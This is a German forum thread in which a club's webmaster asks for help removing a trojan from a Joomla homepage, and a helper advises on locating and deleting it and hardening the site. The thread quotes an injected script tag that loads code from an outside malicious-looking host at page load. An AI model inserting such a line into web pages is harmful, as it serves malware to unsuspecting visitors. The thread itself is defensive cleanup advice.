Trojaner auf der HP |
||
|---|---|---|
| #0
| ||
|
18.09.2011, 21:19
Member
Beiträge: 45 |
||
 
|
|
|
|
19.09.2011, 11:47
Member
 Beiträge: 395 |
#2
Ich würde mal auf das folgende script in deiner index tippen:
<!--footer end--> </div> </div> <script src="http://globalpoweringgatheringon.com/mm.php"></script> </body> </html> __________ Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier 
Protecus Spenden |
|
|
|
|
|
|
19.09.2011, 17:54
Member
Themenstarter Beiträge: 45 |
#3
Vielen Dank für die Antwort!
Ich warte noch auf die Zugangsdaten dann kann ich das Script löschen. Aber was dann? Ich vermute, dass es nicht lange dauert, dann steht das Script wieder drin. Kann es sein, dass es mit Joomla zu tun hat? Wäre z. B. 1&1 ratsamer? |
|
|
|
|
|
|
20.09.2011, 11:30
Member
Beiträge: 395 |
#4
Zitat Nanuk posteteDu vergleichst grade Äpfel mit Birnen Bitte prüfe einfach nur ob du alle Rechte und Sicherheitseinstellungen so gesetzt hast wie es sich gehört. Siehe dazu auch: http://docs.joomla.org/Category:Security_Checklist __________ Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier
Protecus Spenden |
|
|
|
|
|
|
20.09.2011, 18:08
Member
Themenstarter Beiträge: 45 |
#5
Ich habe jetzt die ftp Zugangsdaten erhalten und die komplette HP runtergeladen.
Leider finde ich die infizierte Datei nicht. Wo muss ich suchen? Die Checkliste gehe ich später durch. |
|
|
|
|
|
|
20.09.2011, 20:08
Member
Beiträge: 395 |
#6
als erstes die index in deinem aktivierten template im template ordner ordner prüfen
__________ Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier
Protecus Spenden |
|
|
|
|
|
|
22.09.2011, 20:17
Member
Themenstarter Beiträge: 45 |
#7
Ist es richtig, dass die index die Endung .php haben muss und ca. 10kb groß sein soll?
Ich finde 13 Dateien mit "index.php" diese öffne ich mit Notepad++. Die Datei muss so aussehen wie der Quelltext. Dort muss in der Zeile 208 <script src="http://globalpoweringgatheringon.com/mm.php"></script> stehen und genau das lösche ich. Ist das so richtig? |
|
|
|
|
|
|
22.09.2011, 20:30
Member
Beiträge: 395 |
#8
In deinem Template Ordner sind ordner mit Templates aufgelistet.
Dort suchst du dir DEIN aktives Template aus. In dem Ordner gibt es direkt eine index.php und da rauslöschen __________ Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier
Protecus Spenden |
|
|
|
|
|
|
22.09.2011, 23:00
Member
Themenstarter Beiträge: 45 |
#9
Gibt es noch einen anderen Ordner in dem das Script sein kann?
in "templates" habe ich nichts gefunden. |
|
|
|
|
|
|
23.09.2011, 13:39
Member
Beiträge: 395 |
#10
lade dir ab besten alles auf deine lokale fetplatte runter und durchsuche dann mit der suchfunktion "in dateien suchen oder innerhalb von dateien suchen" oder so nach speziefischen worten aus dem script, dann sollte er es dir ausspucken
__________ Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier
Protecus Spenden |
|
|
|
|
|
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!
bitte erst » hier kostenlos registrieren!!
Folgende Themen könnten Dich auch interessieren:
Seite(n): 1
Copyright © 2024, Protecus.de - Protecus Team - Impressum / Mediadaten
Kann mir bitte jemand helfen?
Auf der HP meines Vereins hat sich ein Trojaner breit gemacht.
[http://www.wachholderbusch.com/]
Mit Firefox merkt man nichts aber mit dem IE bekommt man eine Meldung:
js:fakeav-hz[trj]
Wie bekomme ich das Pferd runter und das Loch gestopft?
Vielen Dank!